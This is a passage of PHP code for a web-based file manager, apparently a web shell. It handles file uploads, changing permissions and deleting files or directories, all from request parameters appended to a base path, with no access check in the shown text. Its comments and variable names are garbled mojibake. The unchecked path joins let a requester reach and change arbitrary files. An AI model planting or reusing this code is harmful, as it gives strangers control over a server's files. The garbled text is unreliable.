if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $ã¿ãŒã²ãããã¡ã€ã«)) {
echo "<p>".htmlspecialchars(basename($_FILES["fileToUpload"]["name"])) . " has been uploaded.</p>";
} else {
echo "<p>Sorry, there was an error uploading your file.</p>";
}
}
/**
* ãã¡ã€ã«ã»ãã©ã«ãã®æš©éå€æŽæ©èœ
* chmodãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåãæš©éå€æŽãã©ãŒã ã衚瀺
*/
if (isset($_GET['chmod']) && isset($_GET['q'])) {
if (!empty($_GET['chmod'])) {
/**
* æš©éå€æŽå¯Ÿè±¡ã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å
šãã¹
*/
$æš©éå€æŽå¯Ÿè±¡ = PATH . "/" . $_GET['chmod'];
/**
* çŸåšã®æš©éãååŸïŒ8é²æ°åœ¢åŒïŒ
*/
$çŸåšã®æš©é = substr(decoct(fileperms($æš©éå€æŽå¯Ÿè±¡)), -3);
/**
* æš©éå€æŽãã©ãŒã ã®è¡šç€º
*/
echo '
<div class="container mt-4">
<h3>Change Permissions</h3>
<form method="post">
<div class="form-group mb-3">
<label for="permissions">Current Permissions: <strong>0' . $çŸåšã®æš©é . '</strong></label>
<input type="text" class="form-control" id="permissions" name="permissions" value="' . $çŸåšã®æš©é . '" placeholder="e.g., 755, 644, 777" maxlength="3" pattern="[0-7]{3}">
<small class="form-text text-muted">Enter permissions in octal format (e.g., 755 for rwxr-xr-x, 644 for rw-r--r--)</small>
</div>
<input type="hidden" name="chmod_target" value="' . htmlspecialchars($_GET['chmod']) . '">
<input type="submit" class="btn btn-dark" value="Change Permissions" name="change_permissions">
<a href="?p=' . 겜ë¡ìžìœë©(PATH) . '" class="btn btn-secondary">Cancel</a>
</form>
</div>';
/**
* æš©éå€æŽåŠçã®å®è¡
* change_permissionsãã©ã¡ãŒã¿ãPOSTãããå Žåããã¡ã€ã«ã»ãã©ã«ãã®æš©éãå€æŽ
*/
if (isset($_POST['change_permissions'])) {
/**
* POSTãããæš©éå€ãååŸ
*/
$æ°ããæš©é = $_POST['permissions'];
/**
* æš©éå€ã®æ€èšŒïŒ3æ¡ã®8é²æ°ã§ããããšã確èªïŒ
*/
if (preg_match('/^[0-7]{3}$/', $æ°ããæš©é)) {
/**
* æš©éå€æŽå¯Ÿè±¡ã®ãã¹
*/
$æš©éå€æŽãã¹ = PATH . "/" . $_POST['chmod_target'];
/**
* 8é²æ°åœ¢åŒã«å€æããŠchmodãå®è¡
*/
$æš©é8é²æ°å€ = octdec($æ°ããæš©é);
/**
* æš©éã®å€æŽãå®è¡
*/
if(chmod($æš©éå€æŽãã¹, $æš©é8é²æ°å€)) {
echo ("<script>alert('Permissions changed successfully to 0" . $æ°ããæš©é . "'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Failed to change permissions.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
} else {
echo ("<script>alert('Invalid permissions format. Please use 3-digit octal format (e.g., 755, 644).'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
}
/**
* ãã¡ã€ã«ã»ãã©ã«ãã®åé€æ©èœ
* dãã©ã¡ãŒã¿ãšqãã©ã¡ãŒã¿ãèšå®ãããŠããå Žåããã¡ã€ã«ã»ãã©ã«ããåé€
*/
if (isset($_GET['d']) && isset($_GET['q'])) {
/**
* åé€å¯Ÿè±¡ã®ãã¡ã€ã«ã»ãã©ã«ãã®å®å
šãã¹
*/
$åå = PATH . "/" . $_GET['d'];
/**
* ãã¡ã€ã«ã®å Žåã®åé€åŠç
*/
if (is_file($åå)) {
if(unlink($åå)) {
echo ("<script>alert('File removed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
/**
* ãã£ã¬ã¯ããªã®å Žåã®åé€åŠç
*/
elseif (is_dir($åå)) {
if(rmdir($åå) == true) {
echo ("<script>alert('Directory removed.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
} else {
echo ("<script>alert('Some error occurred.'); window.location.replace('?p=" . 겜ë¡ìžìœë©(PATH) . "');</script>");
}
}
}
?>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/js/bootstrap.bundle.min.js"
integrity="sha384-w76AqPfDkMBDXo30jS1Sgez6pr3x5MlQ1ZAGC+nuZB+EYdgRZgiwxhTBTkF7CXvN"
crossorigin="anonymous"></script>
</body>
</html>